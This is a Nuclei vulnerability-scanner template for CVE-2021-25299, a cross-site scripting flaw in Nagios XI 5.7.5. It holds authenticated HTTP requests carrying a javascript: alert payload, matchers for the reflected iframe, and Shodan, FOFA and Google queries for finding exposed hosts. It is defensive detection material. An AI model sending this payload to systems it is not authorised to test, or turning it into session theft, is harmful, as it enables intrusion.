nuclei-templates/http/cves/2021/CVE-2021-25299.yaml

70 lines
2.6 KiB
YAML
Raw Permalink Normal View History

2023-02-21 08:44:36 +00:00
id: CVE-2021-25299
info:
name: Nagios XI 5.7.5 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Nagios XI 5.7.5 contains a cross-site scripting vulnerability in the file /usr/local/nagiosxi/html/admin/sshterm.php, due to improper sanitization of user-controlled input. A maliciously crafted URL, when clicked by an admin user, can be used to steal session cookies, or it can be chained with the previous bugs to get one-click remote command execution on the Nagios XI server.
2023-09-06 12:09:01 +00:00
remediation: |
Upgrade Nagios XI to the latest version or apply the provided patch to fix the XSS vulnerability.
2023-02-21 08:44:36 +00:00
reference:
- https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md#cve-2021-25299
- http://nagios.com
- https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-25299
2023-07-11 19:49:27 +00:00
- https://assets.nagios.com/downloads/nagiosxi/versions.php
2023-02-21 08:44:36 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-25299
2023-02-21 08:44:36 +00:00
cwe-id: CWE-79
2024-05-31 19:23:20 +00:00
epss-score: 0.9644
epss-percentile: 0.99577
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*
2023-02-23 18:10:46 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 3
2023-07-11 19:49:27 +00:00
vendor: nagios
product: nagios_xi
shodan-query:
- title:"Nagios XI"
- http.title:"nagios xi"
fofa-query:
- title="nagios xi"
- app="nagios-xi"
2024-05-31 19:23:20 +00:00
google-query: intitle:"nagios xi"
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,nagios,nagiosxi,xss,authenticated
2023-02-21 08:44:36 +00:00
http:
2023-02-21 08:44:36 +00:00
- raw:
- |
GET /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=
- |
GET /nagiosxi/admin/sshterm.php?url=javascript:alert(document.domain) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "contains(header_3, 'text/html')"
2023-02-21 08:44:36 +00:00
- "status_code_3 == 200"
- 'contains(body_3, "iframe src=\"javascript:alert(document.domain)") && contains(body_3, "SSH Terminal")'
condition: and
extractors:
- type: regex
name: nsp
group: 1
regex:
- 'name="nsp" value="(.*)">'
internal: true
2023-07-11 19:49:27 +00:00
part: body
# digest: 4b0a0048304602210092675b0c47ea89040420015957cfac465b1ce8b326c306fe4f449a58f5bc16600221008637625e195b7c2b5e6472542d8203ae20810663c57ef547a3cf8ac55eef0ea3:922c64590222798bb761d5b6d8e72950